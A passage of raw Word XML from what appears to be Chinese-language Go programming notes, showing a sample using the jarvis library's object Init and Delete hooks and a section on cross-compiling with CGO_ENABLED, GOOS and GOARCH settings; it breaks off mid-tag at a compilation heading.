    <w:p w14:paraId="2DE3FB6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E310F04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B19C972" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751EEB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F7CDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A5B500" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/thecxx/jarvis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D99F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A77D54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597FE425" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type sample struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A60371C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782EF493" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C69AF94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type Sample struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D818420" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>*sample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6A4C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC485F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED15BCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// NewSample returns a Sample.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB818A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func NewSample() *Sample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14658292" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Private object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EE30C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>s := &amp;sample{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E690C31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Public object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F057C8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>obj := &amp;Sample{s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40883BBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456887B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>jarvis.InitObject(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B7150" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6F13D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E818F92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6DA8C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F0EB33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (s *sample) Init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C0EF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("initialized\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B571B48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE752B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A1CE8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (s *sample) Delete() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E18EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("deleted\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228EC89D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2EF53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D941726" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>// Init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>方法会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>NewSample</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>时，跟随</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>InitObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5548D808" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (s *sample) Init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669492D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("initialized\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD1CCBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A88D49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2840F187" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>// Delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>方法会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>NewSample</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>需要被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>时调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E90DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (s *sample) Delete() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888AA22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("deleted\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF39C23" w14:textId="1C722806" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47114D30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="299" w:name="_Toc159779759"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨平台打包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w14:paraId="7DCB04CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://cloud.tencent.com/developer/article/1727208</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084088F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144938EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（记作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）作用：</w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/tobycnblogs/p/9977944.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5819DA5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是把调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C++ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包装一下提供给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> golang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用，简单来讲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是统一了一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基本数据类型之类的东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA8B01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45139D2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设置项默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是如果需要则设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C818BE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://stackoverflow.com/questions/64531437/why-is-cgo-enabled-1-default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E124D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484F129D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果使用的是每个操作系统上都有的标准库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>glibc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你不需要开这个选项。使用此选项的程序通常体积会更大一些。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89E7F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71944A16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB3503" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="001565EA" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001565EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SET CGO_ENABLED=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D9A38" w14:textId="6ACBE6EE" w:rsidR="004C452C" w:rsidRPr="001565EA" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001565EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SET GOOS=</w:t>
      </w:r>
      <w:r w:rsidR="00F76C46" w:rsidRPr="001565EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F21FED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="001565EA" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001565EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SET GOARCH=amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF88CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="001565EA" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001565EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F05280" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E99E885" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
